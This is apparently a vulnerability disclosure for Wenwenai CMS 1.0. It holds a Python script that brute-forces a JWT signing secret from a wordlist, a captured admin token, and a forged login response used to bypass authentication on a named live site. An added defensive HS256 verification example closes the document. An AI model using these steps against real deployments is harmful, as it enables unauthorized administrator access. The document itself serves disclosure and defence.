
WenwenAiCms Vulnerability Testing #2

Open
@PwnCYN

Description


Product Name:
Wenwenai CMS

Affect version:
1.0

Case Address:
Demo: https://chat.wenwen-ai.com/
Target: https://laoluoai.com/

Vulnerability Type:
Logic flaw

Description:

The backend login address was found through directory scanning. The login page links to the developer's demo site; logging in with the account and password supplied by the demo site while capturing traffic gives the response packet of a successful login request.
Demo
The successful login response shows that the site relies on a JWT for authentication, and the signing secret can be guessed by blasting (wordlist brute force).

On another site built from the same CMS, where the account and password are unknown, the login response can be replaced with the successful login response captured above; the token passes JWT verification and the backend login succeeds.
Target
When the credentials are not known the server returns a 400 error. Replacing the returned response body with the successful login data bypasses the login.

Blasting:

import jwt
import termcolor

if __name__ == "__main__":
    # Token taken from the captured login response
    jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
    # One candidate secret per line
    with open('topred.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                # PyJWT 2.x always verifies the signature and requires the algorithm list;
                # the old verify=True keyword no longer exists
                jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
                print('\r', 'bingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                # The signature itself was valid; only a claim check failed, so the key is correct
                print('\r', 'bingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\rtry', key_, end='', flush=True)
                continue
        else:
            print('\r', 'sorry! no key was found!')

Poc:

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding

{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}
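Added example, not code from this report or from the CMS: a minimal HS256 issue/verify routine in plain Python with a secret-strength check. It shows the two server-side controls that close both findings above: a long random signing secret that no wordlist will contain, and signature verification on every protected request so that an edited or replayed login response carries no authority. The claim names mirror the token in the response above; the weak-secret list and the test secrets are constructed samples.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Claim layout mirrored from the token in the captured response (constructed sample, not a live token)
DEMO_CLAIMS = {"username": "admin", "id": 2, "email": "admin@admin.com", "role": "admin",
               "openId": "", "iat": 1696935220, "exp": 1697540020}
# Constructed sample of the kind of dictionary secret a wordlist check finds
WEAK_SECRETS = {b"secret", b"password", b"123456", b"admin", b"jwt_secret"}

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def secret_is_acceptable(secret: bytes) -> bool:
    """Deployment check: an HS256 secret must be long and random, never a dictionary word."""
    return len(secret) >= 32 and secret.lower() not in WEAK_SECRETS

def new_secret() -> bytes:
    return secrets.token_bytes(32)  # 256 bits from the OS CSPRNG

def sign_hs256(claims: dict, secret: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"

def verify_hs256(token: str, secret: bytes, now=None):
    """Return the claims only if algorithm, signature and expiry all check out, else None.
    Every protected endpoint must call this; a client-side "code":200 proves nothing."""
    try:
        h, b, s = token.split(".")
        if json.loads(_b64url_decode(h)).get("alg") != "HS256":  # pin the algorithm (no "none")
            return None
        expected = hmac.new(secret, f"{h}.{b}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):  # constant-time compare
            return None
        claims = json.loads(_b64url_decode(b))
        exp = claims.get("exp")
    except (ValueError, AttributeError):  # bad base64, bad JSON, wrong segment count, non-object
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(exp, int) or exp <= now:
        return None
    return claims
```

With a strong secret a token signed with a guessed secret such as "secret" fails verification, and a replayed response body is rejected once its `exp` has passed.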
